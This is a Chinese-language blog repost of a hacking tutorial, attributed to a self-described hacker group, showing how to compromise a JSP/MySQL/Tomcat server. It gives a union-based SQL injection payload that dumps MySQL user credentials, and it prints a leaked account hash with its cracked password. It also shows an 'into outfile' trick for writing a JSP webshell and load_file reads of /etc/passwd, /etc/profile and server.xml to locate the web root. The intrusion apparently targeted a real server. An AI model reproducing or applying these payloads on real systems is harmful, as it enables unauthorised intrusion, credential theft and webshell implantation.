mysql注入找路径_MySQLjsp注入一则Tomcat找路径技巧

最新推荐文章于 2023-03-21 17:19:35 发布
最新推荐文章于 2023-03-21 17:19:35 发布
阅读量262 收藏
点赞数
文章标签: mysql注入找路径
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34755947/article/details/113442411
版权

知道什么是注入中的大爱吗?注入里的大爱莫过于Tomcat+jsp+MySQL了,原因很简单,Tomcat需要SYSTEM或者root的权限,而使用jsp+MySQL的又通常是root,jsp没有php类的GPC

换句话说,这种环境的这种注入,只要有注入点,服务器就八九不离十

注入跟着数据库类型走,所以jsp+MySQL的注入与php+MySQL的注入的开始步骤几乎一致。

关于注入的基本步骤请出门左拐,本版有汇总贴。

作者:YoCo Smart

来自:Silic Group Hacker Army

http://blackbap.org

首先看注入点:

.jsp?id=0'union+select+1,concat(database(),0x3a,user(),0x3a,version()),3,group_concat(user,0x3a,password,0x3a,file_priv,0x3a,host,0x3c62723e)+from+mysql.user#

复制代码

得到信息如下:

a4c26d1e5885305701be709a3d33442f.png

2012-10-5 07:19:01 上传

host为%表示可以外链MySQL数据库,外链一个host为%且file_priv为Y的账户

superht:*E06323846BD27021132723BA86408F7E9623AB24

解得hash为jfyh5353

连接后确认为root权限,可以使用SQL语句

select jsp一句话的hex编码 into outfile

'/路径/webshell.jsp';

复制代码

来获取webshell

但是问题是,服务器中的网站路径并不知道

读取了/etc /passwd这个文件,获得几个比较敏感的路径

/var/www和/home/criterion两个路径,这两个路径以及后面加了/public_html和/htdocs的路径都不是网站路径。

这么看来只好读取Tomcat的配置文件

根据linux下Apache常见配置文件路径来猜Tomcat,根本就猜不出来。

不过这个时候我想到了一个问题。每次要进一个服务器,我们总会换位思考。如果我是那位可爱可敬又可怜的管理员,我会怎么做。

于是我试着把自己比作搭建这台服务器的管理员,服务器没有Apache,没有php,我只搭建Tomcat的话,环境变量我要写入/etc/profile的

突然想起来,原来这么简单。于是:

select

load_file('/etc/profile');

复制代码

这样就获得了Tomcat的路径:

/usr/local/jakarta-tomcat-5.0.19

a4c26d1e5885305701be709a3d33442f.png

2012-10-5 07:36:39 上传

直接读取这个目录下的/conf/server.xml就获得了网站的路径。然后用MySQL将webshell写入这个目录就获得了webshell

weixin_34755947
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql注入路径_MySQL注入(示例代码)
weixin_39599081的博客
02-02 1069
-------------------------------------------------------------------------------------------------------------MYSQL数据库的注入相对于MSSQL来说就简单的多了。常搭配的脚本也是只有PHP,JSP等。我们今天主要以MYSQL5.0+版本为主。函数: database(),user(),v...
环境变量的前世今生(mysql tomcat
思緒凌亂
10-30 1354
一:问题描述: 你曾经是否遇到过:mysql 命令直接在cmd窗口下, 提示不是内部或外部命令,也不是可运行的程序或批处理文件; 你曾经是否遇到过:tomcat 的startup.bat 命令直接在cmd窗口下, 提示不是内部或外部命令,也不是可运行的程序或批处理文件; 你曾经是否遇到过:甚至 有事help命令直接在cmd窗口下, 提示不是内部或外部命令,也不是可运行的程序或批处理文件;(由
MySQL注入秘籍【上篇】
大河之犬的博客
03-21 941
通常使用联合查询注入法,其作用就是,在原来查询条件的基础上,通过关键字union、union all拼接恶意SQL语句,union后面的select得到的结果将拼接到前个select的结果的后面。既然已经知道了查询列数了,那我们就需要判断哪些列的内容是可以显示到前端的,因为能显示到前端的字段,我们在利用时也能直接显示我们想要的数据。报错原理:e的x次方到x每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。直接查询数据库,不需要判断字段数、显位等;
杂七杂八的敏感文件注释<持续更新帖>
weixin_30641999的博客
05-14 99
============敏感文件读取================ WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt...
(2020上半年第8天)小迪网络安全笔记(操作①)URL通过MYSQL注入读取服务器路径
u013630181的博客
06-20 401
补充: 注意①: 符号问题出现\n最好写成/n或者\n以避免识别成换行符 例如:要路径D:\new\nameUrl:?id=1’union select null’D:\new\name’gai改写成 ?id=1’union select null’D:/new/name’或者 ?id=1’union select null’D:\new\name’ 注意②: 文件读写注入需要考虑mysql版本问题,高版本存在secure_file_priv过滤, 数据库如果是高版本,数据库会有防御,解决方法两种,硬钢或
blog.zip_blog_blog mysql_myeclipse_myeclipse mysql_mysql tomcat
09-19
本项目通过集成MyEclipse、Tomcat服务器和MySQL数据库,实现了一个基础但功能完备的博客系统,允许用户进行写日志、日志修改、评论以及删除等操作。 一、MyEclipse与Tomcat的整合 MyEclipse是一款强大的Java集成...
MySQL注入绕开过滤的技巧总结
09-09
MySQL注入是一种常见的安全漏洞,攻击者可以通过输入恶意的SQL语句来操纵数据库,获取敏感信息或执行非授权的操作。当系统有防止SQL注入的过滤机制时,攻击者需要采用一些技巧来绕过这些过滤。以下是一些常见的MySQL...
PHP+MYSQL 注入靶场
最新发布
04-26
**PHP+MYSQL 注入靶场**是一个用于学习和实践**SQL注入**的平台,它包含相关的源代码,有助于用户深入理解漏洞的原理。通过这个靶场,你可以模拟真实环境下的安全测试,提升对SQL注入攻击的防御能力。下面将详细阐述...
C#中实现查mysql的安装路径
09-03
C#中查MySQL安装路径的一种方法是通过执行SQL查询。以下是一个简单的示例函数,`GetMysqlPath()`,它使用了这种方法: ```csharp private string GetMysqlPath() { string strPath = string.Empty; string ...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql注入如何读取本地文件_如何通过SQL注入获取服务器本地文件
weixin_28843191的博客
01-28 557
写在前面的话SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞的SQL语句并从远程服务器...
mysql 注入
qq_58970968的博客
07-31 1945
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
MYSQL注入获取web路径的几个方法。
yihuliunian的博客
09-09 2641
转载自品略图书馆http://www.pinlue.com/article/2019/12/0216/469828704510.html 我们在MYSQL注入的时候经常会碰到无法立即根据在注入点加单引号提交得到的返回信息来获得web目录,这个时候获得web路径就要费点劲了! 针对这种情况,我介绍三种方法!load_file(char(47))查部分*nix系统的目录。 a. 原理 由于load_file()函数相当于*nix中的cat函数,而在某些FreeBSD,Sunos系统中用cat /..
SQL注入之——Mysql+PHP手工获取webshell
温柔小薛的博客
04-04 1581
Mysql+PHP手工获取webshell 目录Mysql+PHP手工获取webshell一、使用 order by 查询字段二、使用联合查询来查询当前数据库、用户、版本信息等三、获取表名、字段、值四、Mysql root 用户密码存储位置五、对服务器文件进行读写操作六、怎么获取 Web 路径七、利用 sql 注入写入 webshell八、MysQL 获取 web 路径方法总结 只是大概流程,等梳...
【SQL注入详解】
一纸荒芜的博客
08-17 3290
sql注入类型与其他扩展
mysql数据库拿shell_利用数据库拿shell的一些姿势
weixin_34569317的博客
01-26 2137
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入,写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
jsp mysql 注入_jsp mysql 注入攻击实例
weixin_29212429的博客
01-27 193
例子 要查询信息 并显示出来SQL 信息表与admin表 插入信息 md5 加密的密码CREATE TABLE `admin` (`Id` int(11) NOT NULL AUTO_INCREMENT,`Name` varchar(40) NOT NULL,`Psw` varchar(100) NOT NULL,PRIMARY KEY (`Id`))ENGINE=InnoDB DEFAULT ...
mysql开始全程访问权限_由Jsp+Mysql注入到root权限的全程展
weixin_31879641的博客
02-04 99
最近有点空闲,所以写点垃圾文章来消磨一下时间.文中没有什么技术含量,如果要转载,请注明作者并保持文章的完整.很多人可能都知道asp,php的编程要防止sql注入漏洞,而并不知道jsp编程同样也需要防备sql注入漏洞.其实,一旦jsp代码有注入漏洞,将直接影响到整个系统的安全。本文就是主要展示一下我的一次JSP+mysql注入导出webshell的过程。www.***.***.cn是国内某一个著名研...
jsp mysql 注入_Jsp+Mysql网站注入并拿root权限的全过程
weixin_42365492的博客
02-01 494
很多人可能都知道asp,php的编程要防止sql注入漏洞,而并不知道jsp编程同样也需要防备sql注入漏洞.其实,一旦jsp代码有注入漏洞,将直接影响到整个系统的安全。本文就是主要展示一下我的一次JSP+MYSQL注入导出webshell的过程。www.***.***.cn是国内某一个著名研究所的网站,我们在这里对其进行善意的测试。当然,在写此文之前我已经将漏洞通知了网站管理员.并对文中所有的图片...
突破MySQL注入防御:绕过技巧与实操演示
MySQL注入绕过技术是一种高级的黑客攻击手段,针对那些依赖于关键词或函数过滤来防止SQL注入的数据库系统。演讲者Johannes Dahse来自德国Bochum,是一位IT安全领域的学生,专注于web安全研究,并且已经开发了PHP源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值